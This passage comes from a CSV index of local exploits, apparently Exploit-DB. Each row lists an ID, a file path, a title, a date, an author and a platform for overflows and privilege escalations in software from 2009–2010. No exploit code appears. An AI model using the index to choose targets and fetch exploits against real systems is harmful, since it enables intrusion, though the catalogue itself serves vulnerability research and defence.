Kernel 2.4.1 < 2.4.37 / 2.6.1 < 2.6.32-rc5 - 'pipe.c' Local Privilege Escalation (3)",2009-11-05,"Matthew Bergin",linux,local, -9859,exploits/freebsd/local/9859.c,"FreeBSD 6.4 - 'pipeclose()'/'knlist_cleardel()' Race Condition",2009-10-08,"Przemyslaw Frasunek",freebsd,local, -9860,exploits/freebsd/local/9860.c,"FreeBSD 7.2 - VFS/devfs Race Condition",2009-10-08,"Przemyslaw Frasunek",freebsd,local, -9865,exploits/windows/local/9865.py,"Adobe Acrobat Reader 7 < 9 - U3D Buffer Overflow",2009-10-27,"Felipe Andres Manzano",windows,local, -9866,exploits/windows/local/9866.txt,"Alleycode HTML Editor 2.2.1 - Local Buffer Overflow",2009-10-29,Dr_IDE,windows,local, -9882,exploits/windows/local/9882.txt,"Mozilla Firefox 3.5.3 - Local Download Manager Temp File Creation",2009-10-28,"Jeremy Brown",windows,local, -9884,exploits/windows/local/9884.txt,"GPG2/Kleopatra 2.0.11 - Malformed Certificate (PoC)",2009-10-21,Dr_IDE,windows,local, -9894,exploits/windows/local/9894.txt,"Millenium MP3 Studio 2.0 - '.m3u' Local Buffer Overflow",2009-10-15,dellnull,windows,local, -9895,exploits/windows/local/9895.txt,"Millenium MP3 Studio 2.0 - 'mpf' Local Buffer Overflow",2009-10-14,dellnull,windows,local, -9955,exploits/hardware/local/9955.txt,"Overland Guardian OS 5.1.041 - Local Privilege Escalation",2009-10-20,trompele,hardware,local, -9970,exploits/windows/local/9970.txt,"South River Technologies WebDrive 9.02 build 2232 - Local Privilege Escalation",2009-10-20,bellick,windows,local, -9973,exploits/multiple/local/9973.sh,"Sun VirtualBox 3.0.6 - Local Privilege Escalation",2009-10-17,prdelka,multiple,local, -9974,exploits/windows/local/9974.pl,"AIMP2 Audio Converter - Playlist Overflow (SEH)",2009-11-16,corelanc0d3r,windows,local, -9983,exploits/windows/local/9983.pl,"Xion Audio Player 1.0 121 - '.m3u' Local Buffer Overflow (2)",2009-10-16,"Dragon Rider",windows,local, -9984,exploits/windows/local/9984.py,"xp-AntiSpy 3.9.7-4 - '.xpas' File Buffer Overflow",2009-10-26,Dr_IDE,windows,local, -9985,exploits/multiple/local/9985.txt,"Xpdf 3.01 - Local Heap Overflow / Null Pointer Dereference",2009-10-17,"Adam Zabrocki",multiple,local, -14273,exploits/linux/local/14273.sh,"Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (1)",2010-07-08,"Kristian Erik Hermansen",linux,local, -9988,exploits/windows/local/9988.txt,"Adobe Photoshop Elements - Active File Monitor Service Privilege Escalation",2009-10-29,bellick,windows,local, -9990,exploits/multiple/local/9990.txt,"Adobe Reader / Acrobat - '.U3D' File Invalid Array Index Overflow",2009-11-09,"Felipe Andres Manzano",multiple,local, -9991,exploits/windows/local/9991.txt,"Alleycode 2.21 - Local Overflow (SEH) (PoC)",2009-10-05,"Rafael Sousa",windows,local, -10009,exploits/windows/local/10009.txt,"Free Download Manager - Torrent File Parsing Multiple Remote Buffer Overflow Vulnerabilities (Metasploit)",2009-11-11,"Carsten Eiram",windows,local, -10010,exploits/windows/local/10010.txt,"Free WMA MP3 Converter 1.1 - '.wav' Local Buffer Overflow",2009-10-09,KriPpLer,windows,local, -10018,exploits/linux/local/10018.sh,"Linux Kernel 2.6.32 - 'pipe.c' Local Privilege Escalation (4)",2009-11-12,"Earl Chew",linux,local, -10038,exploits/linux/local/10038.txt,"proc File - Descriptors Directory Permissions Bypass",2009-10-23,"Pavel Machek",linux,local, -10039,exploits/windows/local/10039.txt,"GPG4Win GNU - Privacy Assistant (PoC)",2009-10-23,Dr_IDE,windows,local, -10044,exploits/unix/local/10044.pl,"ProFTPd 1.3.0 (OpenSUSE) - 'mod_ctrls' Local Stack Overflow",2009-10-12,"Michael Domberg",unix,local, -10060,exploits/linux/local/10060.sh,"Geany .18 - Local File Overwrite",2009-10-06,"Jeremy Brown",linux,local, -10072,exploits/multiple/local/10072.c,"Multiple Vendor - TLS Protocol Session Renegotiation Security",2009-11-12,"Marsh Ray",multiple,local, -10076,exploits/osx/local/10076.c,"VMware Fusion 2.0.5 - vmx86 kext Kernel Privilege Escalation",2009-10-02,mu-b,osx,local, -10078,exploits/osx/local/10078.c,"VMware Fusion 2.0.5 - vmx86 kext Local (PoC)",2009-10-02,mu-b,osx,local, -33426,exploits/windows/local/33426.pl,"CyberLink Power2Go Essential 9.0.1002.0 - Registry Buffer Overflow (SEH Unicode)",2014-05-19,"Mike Czumak",windows,local, -10084,exploits/windows/local/10084.txt,"Quick Heal 10.00 SP1 - Local Privilege Escalation",2009-10-13,"Maxim A. Kulakov",windows,local, -10201,exploits/windows/local/10201.pl,"TEKUVA - Password Reminder Authentication Bypass",2009-11-21,iqlusion,windows,local, -10207,exploits/multiple/local/10207.txt,"VMware Virtual 8086 - Linux Local Ring0",2009-10-27,"Tavis Ormandy & Julien Tinnes",multiple,local, -10211,exploits/windows/local/10211.txt,"Autodesk SoftImage Scene TOC - Arbitrary Command Execution",2009-11-23,"Core Security",windows,local, -10213,exploits/windows/local/10213.txt,"Autodesk Maya Script - Nodes Arbitrary Command Execution",2009-11-23,"Core Security",windows,local, -10226,exploits/windows/local/10226.py,"Serenity Audio Player Playlist - '.m3u' Local Buffer Overflow",2009-11-25,Rick2600,windows,local, -10240,exploits/windows/local/10240.py,"Millenium MP3 Studio 2.0 - 'pls' Local Buffer Overflow",2009-11-28,Molotov,windows,local, -10244,exploits/windows/local/10244.txt,"MuPDF < 20091125231942 - pdf_shade4.c Multiple Stack Based Buffer Overflows",2009-11-28,"Christophe Devine",windows,local, -10255,exploits/bsd/local/10255.txt,"FreeBSD 8.0 Run-Time Link-Editor (RTLD) - Local Privilege Escalation",2009-11-30,kingcope,bsd,local, -10264,exploits/multiple/local/10264.txt,"Oracle - SYS.LT.MERGEWORKSPACE Evil Cursor",2009-12-01,"Andrea Purificato",multiple,local, -10265,exploits/multiple/local/10265.txt,"Oracle - SYS.LT.COMPRESSWORKSPACETREE Evil Cursor",2009-12-01,"Andrea Purificato",multiple,local, -10266,exploits/multiple/local/10266.txt,"Oracle - ctxsys.drvxtabc.create_tables Evil Cursor",2009-12-01,"Andrea Purificato",multiple,local, -10267,exploits/multiple/local/10267.txt,"Oracle - ctxsys.drvxtabc.create_tables",2009-12-01,"Andrea Purificato",multiple,local, -10268,exploits/multiple/local/10268.txt,"Oracle - SYS.LT.REMOVEWORKSPACE Evil Cursor",2009-12-01,"Andrea Purificato",multiple,local, -10280,exploits/windows/local/10280.py,"AIMP2 Audio Converter 2.53 build 330 - Playlist '.pls' Unicode Buffer Overflow",2009-11-21,mr_me,windows,local, -10281,exploits/windows/local/10281.php,"Adobe Illustrator CS4 14.0.0 - Encapsulated Postscript '.eps' Local Buffer Overflow",2009-12-03,pyrokinesis,windows,local, -10295,exploits/windows/local/10295.txt,"DAZ Studio - Arbitrary Command Execution",2009-12-03,"Core Security",windows,local, -10296,exploits/php/local/10296.txt,"PHP 5.2.10/5.3.0 - 'ini_restore()' Memory Information Disclosure",2009-12-03,"Maksymilian Arciemowicz",php,local, -10298,exploits/windows/local/10298.c,"Jasc Paint Shop Pro 8 - Local Universal Buffer Overflow",2009-12-04,"fl0 fl0w",windows,local, -10313,exploits/linux/local/10313.c,"Libmodplug - 's3m' Remote Buffer Overflow",2008-02-25,dummy,linux,local, -10319,exploits/windows/local/10319.py,"PointDev IDEAL Administration 2009 9.7 - Local Buffer Overflow",2009-12-05,Dr_IDE,windows,local, -10320,exploits/windows/local/10320.py,"M3U To ASX-WPL 1.1 - '.m3u' Local Buffer Overflow",2009-12-05,Encrypt3d.M!nd,windows,local, -10321,exploits/windows/local/10321.py,"Microsoft HTML Help Workshop 4.74 - '.hhp' Local Buffer Overflow (1)",2009-12-05,Encrypt3d.M!nd,windows,local, -10322,exploits/windows/local/10322.py,"Audacity 1.2.6 - '.gro' Local Buffer Overflow",2009-12-05,Encrypt3d.M!nd,windows,local, -10323,exploits/windows/local/10323.py,"HTML Help Workshop 4.74 - hhp Universal Buffer Overflow",2009-12-05,Dz_attacker,windows,local, -10326,exploits/multiple/local/10326.txt,"Ghostscript < 8.64 - 'gdevpdtb.c' Local Buffer Overflow",2009-02-03,"Wolfgang Hamann",multiple,local, -10332,exploits/windows/local/10332.rb,"PointDev IDEAL Administration 2009 9.7 - Local Buffer Overflow (Metasploit)",2009-12-06,dookie,windows,local, -10335,exploits/windows/local/10335.rb,"HTML Help Workshop 4.74 - '.hhp' Local Buffer Overflow (Metasploit)",2009-12-07,loneferret,windows,local, -10339,exploits/windows/local/10339.pl,"gAlan 0.2.1 - Local Buffer Overflow (1)",2009-12-07,"Jeremy Brown",windows,local, -10344,exploits/windows/local/10344.rb,"Adobe Illustrator CS4 14.0.0 - eps Universal Buffer Overflow (Metasploit)",2009-12-07,dookie,windows,local, -10345,exploits/windows/local/10345.py,"gAlan - '.galan' Universal Buffer Overflow",2009-12-07,Dz_attacker,windows,local, -10346,exploits/windows/local/10346.rb,"gAlan 0.2.1 - Universal Buffer Overflow (Metasploit)",2009-12-07,loneferret,windows,local, -10353,exploits/windows/local/10353.pl,"Audio Workstation - '.pls' Local Buffer Overflow (SEH)",2009-09-24,germaya_x,windows,local, -10359,exploits/windows/local/10359.py,"Audio Workstation 6.4.2.4.0 - '.pls' Universal Local Buffer Overflow",2009-12-09,mr_me,windows,local, -10363,exploits/windows/local/10363.rb,"Audio Workstation 6.4.2.4.3 - '.pls' Local Buffer Overflow (Metasploit)",2009-12-09,dookie,windows,local, -10371,exploits/windows/local/10371.pl,"Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (1)",2009-12-10,germaya_x,windows,local, -10373,exploits/windows/local/10373.rb,"Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (Metasploit)",2009-12-10,"loneferret germaya_x",windows,local, -10374,exploits/windows/local/10374.pl,"Easy RM to MP3 Converter 2.7.3.700 - Local Buffer Overflow",2009-12-10,"Vinod Sharma",windows,local, -10392,exploits/windows/local/10392.rb,"Millenium MP3 Studio 2.0 - '.pls' Universal Stack Overflow (Metasploit)",2009-12-11,dookie,windows,local, -10396,exploits/linux/local/10396.pl,"Mozilla Codesighs - Memory Corruption (PoC)",2009-12-12,"Jeremy Brown",linux,local, -10423,exploits/windows/local/10423.pl,"RM Downloader 3.0.2.1 - '.m3u' Local Stack Overflow",2009-12-14,"Vinod Sharma",windows,local, -10475,exploits/windows/local/10475.txt,"QuickHeal AntiVirus 2010 - Local Privilege Escalation",2009-12-16,"Francis Provencher",windows,local, -10484,exploits/windows/local/10484.txt,"Kaspersky Lab (Multiple Products) - Local Privilege Escalation",2009-12-16,"Maxim A. Kulakov",windows,local, -10487,exploits/linux/local/10487.txt,"VideoCache 1.9.2 - 'vccleaner' Local Privilege Escalation",2009-12-16,"Dominick LaTrappe",linux,local, -10544,exploits/multiple/local/10544.html,"Mozilla Firefox - Location Bar Spoofing",2009-12-18,"Jordi Chancel",multiple,local, -10556,exploits/windows/local/10556.c,"PlayMeNow 7.3/7.4 - '.M3U' Playlist File Buffer",2009-12-19,Gr33nG0bL1n,windows,local, -10557,exploits/php/local/10557.php,"PHP 5.2.12/5.3.1 - 'symlink()' open_basedir Bypass",2009-12-19,"Maksymilian Arciemowicz",php,local, -10563,exploits/windows/local/10563.py,"PlayMeNow (Windows XP Universal) - '.M3U' Playlist Buffer Overflow",2009-12-19,loneferret,windows,local, -10577,exploits/windows/local/10577.pl,"PlayMeNow - '.M3U' Playlist Buffer Overflow (SEH)",2009-12-21,"ThE g0bL!N",windows,local, -10595,exploits/windows/local/10595.pl,"CoolPlayer 2.18 - M3U Playlist Buffer Overflow",2009-12-22,data$hack,windows,local, -10596,exploits/windows/local/10596.pl,"PlayMeNow - '.m3u' Universal XP Buffer Overflow (SEH)",2009-12-22,"ThE g0bL!N",windows,local, -10602,exploits/windows/local/10602.pl,"Easy RM to MP3 27.3.700 (Windows XP SP3) - Local Overflow",2009-12-22,d3b4g,windows,local, -10613,exploits/linux/local/10613.c,"Linux Kernel 2.6.18 < 2.6.18-20 - Local Privilege Escalation",2009-12-23,DigitALL,linux,local, -10618,exploits/windows/local/10618.py,"Adobe Reader / Acrobat - '.PDF' File Overflow",2009-12-23,"Ahmed Obied",windows,local, -10619,exploits/windows/local/10619.c,"Easy RM to MP3 27.3.700 (Windows XP SP2) - Local Buffer Overflow",2009-12-23,bibi-info,windows,local, -10620,exploits/windows/local/10620.py,"Easy RM to MP3 2.7.3.700 - Local Buffer Overflow",2009-12-23,dijital1,windows,local, -10628,exploits/windows/local/10628.pl,"CastRipper 2.50.70 (Windows XP SP3) - '.pls' Local Stack Buffer Overflow",2009-12-24,d3b4g,windows,local, -10642,exploits/windows/local/10642.rb,"Easy RM to MP3 2.7.3.700 - Local Overflow",2009-12-24,"John Babio",windows,local, -10646,exploits/windows/local/10646.c,"CastRipper (Windows XP SP2) - '.m3u' Local Stack Buffer Overflow",2009-12-24,bibi-info,windows,local, -10664,exploits/windows/local/10664.py,"ReGet Deluxe 5.2 (build 330) - Local Stack Overflow",2009-12-25,Encrypt3d.M!nd,windows,local, -14158,exploits/windows/local/14158.pl,"Mini-stream RM-MP3 Converter 3.1.2.1 - '.m3u' Local Buffer Overflow",2010-07-01,Madjix,windows,local, -10744,exploits/windows/local/10744.rb,"Media Jukebox 8.0.400 - Local Buffer Overflow (SEH) (Metasploit)",2009-12-27,dijital1,windows,local, -10745,exploits/windows/local/10745.c,"Mini-stream Ripper 3.0.1.1 - '.pls' Universal Local Buffer Overflow",2009-12-27,mr_me,windows,local, -10747,exploits/windows/local/10747.py,"Mini-stream Ripper (Windows XP SP2/SP3) - Local Overflow",2009-12-27,dijital1,windows,local, -10748,exploits/windows/local/10748.rb,"Mini-stream 3.0.1.1 - Local Buffer Overflow (Metasploit)",2009-12-27,dijital1,windows,local, -10759,exploits/windows/local/10759.pl,"M.J.M. Quick Player 1.2 - Local Stack Buffer Overflow",2009-12-28,corelanc0d3r,windows,local, -10782,exploits/windows/local/10782.pl,"Mini-stream Ripper 3.0.1.1 - '.pls' Universal Buffer Overflow (Perl)",2009-12-29,jacky,windows,local, -10786,exploits/windows/local/10786.py,"Soritong 1.0 - Universal Buffer Overflow (Python)",2009-12-29,jacky,windows,local, -10787,exploits/windows/local/10787.py,"Mini-stream Ripper 3.0.1.1 - '.pls' Universal Buffer Overflow (Python)",2009-12-29,jacky,windows,local, -10797,exploits/windows/local/10797.py,"Quick Player 1.2 - Unicode Buffer Overflow (1)",2009-12-30,mr_me,windows,local, -10827,exploits/windows/local/10827.rb,"DJ Studio Pro 5.1.6.5.2 - Local Overflow (SEH)",2009-12-30,"Sébastien Duquette",windows,local, -10920,exploits/windows/local/10920.cpp,"VirtualDJ Trial 6.0.6 'New Year Edition' - '.m3u' Local Overflow",2010-01-02,"fl0 fl0w",windows,local, -10936,exploits/windows/local/10936.c,"PlayMeNow (Windows XP SP2 French) - '.M3U' Playlist Buffer Overflow",2010-01-03,bibi-info,windows,local, -11010,exploits/windows/local/11010.rb,"PlayMeNow 7.3/7.4 - Local Buffer Overflow (Metasploit)",2010-01-06,blake,windows,local, -11029,exploits/multiple/local/11029.txt,"DirectAdmin 1.33.6 - Symlink Security Bypass",2010-01-06,alnjm33,multiple,local, -11046,exploits/windows/local/11046.py,"Quick Player 1.2 - Unicode Buffer Overflow (2)",2010-01-06,sinn3r,windows,local, -11079,exploits/windows/local/11079.rb,"Audiotran 1.4.1 (Windows XP SP2/SP3 English) - Local Buffer Overflow",2010-01-10,"Sébastien Duquette",windows,local, -11093,exploits/windows/local/11093.rb,"Soritong 1.0 - Universal Buffer Overflow (SEH) (Metasploit)",2010-01-10,fb1h2s,windows,local, -11109,exploits/windows/local/11109.rb,"Audiotran 1.4.1 - '.pls' Local Stack Overflow (Metasploit)",2010-01-11,dookie,windows,local, -11112,exploits/win_x86/local/11112.c,"HTMLDOC 1.9.x-r1629 (Windows x86) - '.html' Local Buffer Overflow",2010-01-11,"fl0 fl0w",win_x86,local, -11139,exploits/windows/local/11139.c,"Winamp 5.05 < 5.13 - '.ini' Local Stack Buffer Overflow (PoC)",2010-01-14,"fl0 fl0w",windows,local, -11146,exploits/windows/local/11146.py,"BS.Player 2.51 - Overwrite (SEH)",2010-01-15,"Mert SARICA",windows,local, -11152,exploits/windows/local/11152.py,"Google SketchUp 7.1.6087 - 'lib3ds' 3DS Importer Memory Corruption",2010-01-16,mr_me,windows,local, -11154,exploits/windows/local/11154.py,"BS.Player 2.51 - Universal Overflow (SEH)",2010-01-16,Dz_attacker,windows,local, -11161,exploits/windows/local/11161.pl,"Rosoft Media Player 4.4.4 - Local Buffer Overflow (SEH) (1)",2010-01-16,Red-D3v1L,windows,local, -11171,exploits/windows/local/11171.pl,"Audiotran 1.4.1 - Direct RET Buffer Overflow",2010-01-17,jacky,windows,local, -11174,exploits/windows/local/11174.c,"VideoLAN VLC Media Player 0.8.6 a/b/c/d (Win32 Universal) - '.ass' Local Buffer Overflow",2010-01-17,"fl0 fl0w",windows,local, -11191,exploits/windows/local/11191.pl,"Millenium MP3 Studio 1.x - '.m3u' Local Stack Overflow",2010-01-19,NeoCortex,windows,local, -11199,exploits/windows/local/11199.txt,"Microsoft Windows NT/2000/2003/2008/XP/Vista/7 - 'KiTrap0D' User Mode to Ring Escalation (MS10-015)",2010-01-19,"Tavis Ormandy",windows,local, -11202,exploits/windows/local/11202.pl,"RM Downloader - '.m3u' Local Buffer Overflow (SEH)",2010-01-19,jacky,windows,local, -11205,exploits/windows/local/11205.pl,"MP3 Studio 1.x - '.m3u' Local Stack Overflow (Universal)",2010-01-20,"D3V!L FUCKER",windows,local, -11208,exploits/windows/local/11208.pl,"jetAudio 8.0.0.2 Basic - '.m3u' Local Stack Overflow",2010-01-21,cr4wl3r,windows,local, -11219,exploits/windows/local/11219.pl,"SOMPL Player 1.0 - Local Buffer Overflow",2010-01-22,Rick2600,windows,local, -11229,exploits/windows/local/11229.txt,"Microsoft Internet Explorer - 'wshom.ocx' (Run) ActiveX Remote Code Execution (Add Admin)",2010-01-22,Stack,windows,local, -11232,exploits/windows/local/11232.c,"Authentium SafeCentral 2.6 - 'shdrv.sys' Local Kernel Ring0 SYSTEM",2010-01-22,mu-b,windows,local, -11255,exploits/windows/local/11255.pl,"Winamp 5.572 - 'whatsnew.txt' Local Stack Overflow",2010-01-25,Dz_attacker,windows,local, -11256,exploits/windows/local/11256.pl,"Winamp 5.572 (Windows XP SP3 DE) - 'whatsnew.txt' Local Buffer Overflow",2010-01-25,NeoCortex,windows,local, -11264,exploits/windows/local/11264.rb,"South River Technologies WebDrive Service 9.02 build 2232 - Bad Security Descriptor Privilege Escalation",2010-01-26,Trancer,windows,local, -11267,exploits/windows/local/11267.py,"Winamp 5.572 - Local Overflow (SEH)",2010-01-26,TecR0c,windows,local, -11281,exploits/windows/local/11281.c,"Rising AntiVirus 2008/2009/2010 - Local Privilege Escalation",2010-01-28,Dlrow,windows,local, -11314,exploits/windows/local/11314.py,"CoreFTP 2.1 b1637 - Password field Universal Buffer Overflow",2010-02-02,mr_me,windows,local, -11315,exploits/windows/local/11315.c,"DeepBurner pro 1.9.0.228 - '.dbr' file Buffer Overflow (Universal)",2010-02-02,"fl0 fl0w",windows,local, -11317,exploits/windows/local/11317.c,"Qihoo 360 Security Guard 6.1.5.1009 - breg device drivers Privilege Escalation",2010-02-02,anonymous,windows,local, -11331,exploits/windows/local/11331.txt,"Ipswitch IMAIL 11.01 - Reversible Encryption + weak ACL",2010-02-04,sinn3r,windows,local, -11333,exploits/windows/local/11333.pl,"FoxPlayer 1.7.0 - '.m3u' Local Buffer Overflow",2010-02-05,cr4wl3r,windows,local, -11364,exploits/multiple/local/11364.txt,"LDAP - Injection (PoC)",2010-02-09,mc2_s3lector,multiple,local, -11372,exploits/windows/local/11372.c,"UltraISO 9.3.6.2750 - Local Buffer Overflow",2010-02-09,"fl0 fl0w",windows,local, -11379,exploits/windows/local/11379.c,"feedDemon 3.1.0.9 - '.opml' File Buffer Overflow",2010-02-09,"fl0 fl0w",windows,local, -11384,exploits/windows/local/11384.py,"WM Downloader 3.0.0.9 (Windows XP SP3) - PLS PLA",2010-02-10,"Beenu Arora",windows,local, -11400,exploits/windows/local/11400.py,"RadASM 2.2.1.6 - '.rap' Universal Buffer Overflow",2010-02-11,Dz_attacker,windows,local, -11408,exploits/win_x86/local/11408.c,"RadASM - '.rap' file Local Buffer Overflow",2010-02-11,"fl0 fl0w",win_x86,local, -11413,exploits/windows/local/11413.pl,"CastRipper 2.50.70 - '.asx' Playlist Stack Overflow",2010-02-12,"Jordi Chancel",windows,local, -11465,exploits/windows/local/11465.py,"Ollydbg 2.00 Beta1 - Local Buffer Overflow",2010-02-15,_SuBz3r0_,windows,local, -11475,exploits/windows/local/11475.txt,"OtsTurntables Free 1.00.047 - '.olf' Universal Buffer Overflow",2010-02-16,mr_me,windows,local, -11491,exploits/multiple/local/11491.rb,"Apple iTunes 9.0.1 - '.pls' Handling Buffer Overflow",2010-02-17,"S2 Crew",multiple,local, -11561,exploits/multiple/local/11561.html,"Mozilla Firefox 3.6 - URL Spoofing",2010-02-24,anonymous,multiple,local, -11573,exploits/windows/local/11573.c,"Mediacoder 0.7.3.4605 - Local Buffer Overflow",2010-02-24,"fl0 fl0w",windows,local, -11581,exploits/windows/local/11581.py,"Orbital Viewer 1.04 - '.orb' File Local Universal Overflow (SEH)",2010-02-26,mr_me,windows,local, -11647,exploits/windows/local/11647.pl,"Yahoo Player 1.0 - '.m3u' / '.pls' / '.ypl' Local Buffer Overflow (SEH)",2010-03-07,Mr.tro0oqy,windows,local, -11651,exploits/multiple/local/11651.sh,"(Tod Miller's) Sudo/SudoEdit 1.6.9p21/1.7.2p4 - Local Privilege Escalation",2010-03-07,kingcope,multiple,local, -11656,exploits/windows/local/11656.py,"QuickZip 4.x - '.zip' Local Universal Buffer Overflow (PoC)",2010-03-08,"corelanc0d3r & mr_me",windows,local, -11663,exploits/windows/local/11663.txt,"Lenovo Hotkey Driver 5.33 - Local Privilege Escalation",2010-03-09,"Chilik Tamir",windows,local, -14092,exploits/windows/local/14092.c,"Kingsoft Writer 2010 - Local Stack Buffer Overflow",2010-06-28,"fl0 fl0w",windows,local, -11682,exploits/windows/local/11682.py,"Mini-stream Ripper 3.0.1.1 - '.m3u' HREF Buffer Overflow",2010-03-10,l3D,windows,local, -11713,exploits/windows/local/11713.pl,"Yahoo Player 1.0 - '.m3u' Local Buffer Overflow",2010-03-13,Bombard,windows,local, -11764,exploits/windows/local/11764.pl,"QuickZip 4.60.019 (Windows XP SP3) - Local Stack Buffer Overflow",2010-03-15,corelanc0d3r,windows,local, -11779,exploits/windows/local/11779.pl,"Windisc 1.3 - Local Stack Buffer Overflow",2010-03-16,Rick2600,windows,local, -11786,exploits/windows/local/11786.txt,"Virtual PC Hypervisor - Memory Protection",2010-03-17,"Core Security",windows,local, -11787,exploits/windows/local/11787.py,"Adobe Reader PDF - LibTiff Integer Overflow Code Execution",2010-03-17,villy,windows,local, -11789,exploits/multiple/local/11789.c,"VariCAD 2010-2.05 EN - Local Buffer Overflow",2010-03-17,n00b,multiple,local, -11791,exploits/windows/local/11791.pl,"myMP3-Player 3.0 - '.m3u' Local Buffer Overflow (SEH)",2010-03-18,n3w7u,windows,local, -11794,exploits/windows/local/11794.c,"Mediacoder - '.lst' Local Buffer Overflow",2010-03-18,"fl0 fl0w",windows,local, -11797,exploits/windows/local/11797.py,"ZippHo 3.0.6 - '.zip' Local Stack Buffer Overflow (PoC)",2010-03-18,mr_me,windows,local, -11828,exploits/windows/local/11828.py,"Crimson Editor r3.70 - Overwrite (SEH) (PoC)",2010-03-21,mr_me,windows,local, -11834,exploits/windows/local/11834.py,"Kenward Zipper 1.4 - Local Stack Buffer Overflow (PoC)",2010-03-22,mr_me,windows,local, -11872,exploits/windows/local/11872.py,"KenWard's Zipper 1.400 - Local Buffer Overflow (2)",2010-03-25,sinn3r,windows,local, -11900,exploits/windows/local/11900.pl,"Mini-stream RM-MP3 Converter 3.0.0.7 - '.pls' Universal Stack Buffer Overflow",2010-03-27,mat,windows,local, -11909,exploits/windows/local/11909.txt,"Mini-stream Ripper 3.1.0.8 - Local Stack Overflow",2010-03-28,"Hazem mofeed",windows,local, -11911,exploits/windows/local/11911.py,"Stud_PE 2.6.05 - Local Stack Overflow (PoC)",2010-03-28,zha0,windows,local, -11944,exploits/windows/local/11944.pl,"ASX to MP3 Converter 3.0.0.100 - '.pls' Universal Stack Overflow",2010-03-28,mat,windows,local, -11953,exploits/windows/local/11953.py,"RM Downloader 3.0.2.1 - '.asx' Local Buffer Overflow (SEH)",2010-03-30,b0telh0,windows,local, -11957,exploits/windows/local/11957.py,"Shadow Stream Recorder 3.0.1.7 - '.asx' Local Buffer Overflow",2010-03-30,b0telh0,windows,local, -11958,exploits/windows/local/11958.py,"ASX to MP3 Converter 3.0.0.100 - Local Stack Overflow",2010-03-30,"Hazem mofeed",windows,local, -11976,exploits/windows/local/11976.php,"Free MP3 CD Ripper 2.6 - '.wav' Local Stack Buffer Overflow",2010-03-31,mr_me,windows,local, -11981,exploits/windows/local/11981.py,"WM Downloader 3.0.0.9 - '.asx' Local Buffer Overflow",2010-03-31,b0telh0,windows,local, -11987,exploits/windows/local/11987.txt,"Adobe Reader - Escape From '.PDF' Execute Embedded Executable",2010-03-31,"Didier Stevens",windows,local, -12008,exploits/windows/local/12008.pl,"TugZip 3.5 Archiver - '.ZIP' File Buffer Overflow",2010-04-01,Lincoln,windows,local, -12012,exploits/windows/local/12012.txt,"Free MP3 CD Ripper 2.6 - '.wav' Local Overflow",2010-04-02,"Richard leahy",windows,local, -12024,exploits/windows/local/12024.php,"Zip Unzip 6.0 - '.zip' Local Stack Buffer Overflow (PoC)",2010-04-03,mr_me,windows,local, -12035,exploits/windows/local/12035.pl,"ZipScan 2.2c - Local Overflow (SEH)",2010-04-03,"Lincoln & corelanc0d3r",windows,local, -12051,exploits/windows/local/12051.php,"PHP 6.0 Dev - 'str_transliterate()' Local Buffer Overflow",2010-04-04,"Yakir Wizman",windows,local, -12053,exploits/windows/local/12053.py,"ZipCentral - '.zip' File (SEH)",2010-04-04,TecR0c,windows,local, -12059,exploits/windows/local/12059.pl,"eZip Wizard 3.0 - '.zip' File (SEH)",2010-04-04,"Lincoln & corelanc0d3r",windows,local, -12090,exploits/freebsd/local/12090.txt,"McAfee Email Gateway (formerly IronMail) - Local Privilege Escalation",2010-04-06,"Nahuel Grisolia",freebsd,local, -12091,exploits/freebsd/local/12091.txt,"McAfee Email Gateway (formerly IronMail) - Internal Information Disclosure",2010-04-06,"Nahuel Grisolia",freebsd,local, -12103,exploits/multiple/local/12103.txt,"Local Glibc Shared Library (.so) 2.11.1 - Code Execution",2010-04-07,Rh0,multiple,local, -12130,exploits/linux/local/12130.py,"ReiserFS (Linux Kernel 2.6.34-rc3 / RedHat / Ubuntu 9.10) - 'xattr' Local Privilege Escalation",2010-04-09,"Jon Oberheide",linux,local, -12189,exploits/windows/local/12189.php,"PHP 6.0 Dev - 'str_transliterate()' Local Buffer Overflow (NX + ASLR Bypass)",2010-04-13,ryujin,windows,local, -12213,exploits/windows/local/12213.c,"Micropoint ProActive Denfense 'Mp110013.sys' 1.3.10123.0 - Local Privilege Escalation",2010-04-14,MJ0011,windows,local, -20109,exploits/windows/local/20109.rb,"Photodex ProShow Producer 5.0.3256 - load File Handling Buffer Overflow (Metasploit)",2012-07-27,Metasploit,windows,local, -12255,exploits/windows/local/12255.rb,"Winamp 5.572 - 'whatsnew.txt' (SEH) (Metasploit)",2010-04-16,blake,windows,local, -12261,exploits/windows/local/12261.rb,"Archive Searcher - '.zip' Local Stack Overflow",2010-04-16,Lincoln,windows,local, -12293,exploits/windows/local/12293.py,"TweakFS 1.0 - FSX Edition Stack Buffer Overflow",2010-04-19,corelanc0d3r,windows,local, -12326,exploits/windows/local/12326.py,"ZipGenius 6.3.1.2552 - 'zgtips.dll' Local Stack Buffer Overflow",2010-04-21,corelanc0d3r,windows,local, -12342,exploits/windows/local/12342.pl,"EDraw Flowchart ActiveX Control 2.3 - '.edd parsing' Remote Buffer Overflow (PoC)",2010-04-22,LiquidWorm,windows,local, -12368,exploits/windows/local/12368.pl,"ZipWrangler 1.20 - '.zip' File (SEH)",2010-04-24,"TecR0c & Sud0",windows,local, -12379,exploits/windows/local/12379.php,"Easyzip 2000 3.5 - '.zip' Local Stack Buffer Overflow (PoC)",2010-04-25,mr_me,windows,local, -12388,exploits/windows/local/12388.rb,"WM Downloader 3.0.0.9 - Local Buffer Overflow (Metasploit)",2010-04-25,blake,windows,local, -12403,exploits/windows/local/12403.py,"IDEAL Administration 2010 10.2 - Local Buffer Overflow",2010-04-26,Dr_IDE,windows,local, -12404,exploits/windows/local/12404.py,"IDEAL Migration 2009 4.5.1 - Local Buffer Overflow",2010-04-26,Dr_IDE,windows,local, -12406,exploits/windows/local/12406.py,"Avast! 4.7 - 'aavmker4.sys' Local Privilege Escalation",2010-04-27,ryujin,windows,local, -12469,exploits/windows/local/12469.rb,"Urgent Backup 3.20 / ABC Backup Pro 5.20 / ABC Backup 5.50 - '.zip' File (SEH)",2010-04-30,Lincoln,windows,local, -12497,exploits/windows/local/12497.c,"PhotoFiltre Studio X - '.tif' Local Buffer Overflow (PoC)",2010-05-04,"fl0 fl0w",windows,local, -12501,exploits/windows/local/12501.php,"Beyond Compare 3.0.13 b9599 - '.zip' Local Stack Buffer Overflow (PoC)",2010-05-04,mr_me,windows,local, -12516,exploits/windows/local/12516.py,"BaoFeng Storm - '.m3u' File 